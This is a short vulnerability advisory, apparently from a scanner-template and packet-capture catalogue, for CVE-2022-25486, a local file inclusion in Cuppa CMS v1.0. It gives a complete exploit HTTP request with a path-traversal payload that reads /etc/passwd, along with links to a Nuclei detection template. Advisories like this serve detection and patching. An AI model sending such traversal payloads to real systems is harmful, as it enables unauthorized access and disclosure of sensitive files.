| Title | Cuppa CMS v1.0 - Local File Inclusion |
|---|---|
| Author | theamanrawat |
| Severity | High |
| Impact | Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution. |
| Remediation | Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the LFI vulnerability. |
| CVSS Score | 7.8 |
| EPSS Score | 0.68833 |
| CVE ID | CVE-2022-25486 |
| CWE ID | CWE-829 |
| Tags | cve cve2022 lfi cuppa cuppacms vkev vuln |
CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertConfigField.php.
POST /alerts/alertConfigField.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.5.20) Gecko/ Firefox/9.0
Connection: close
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
urlConfig=../../../../../../../../../etc/passwd
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-25486.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-25486.pcap
N/AN/A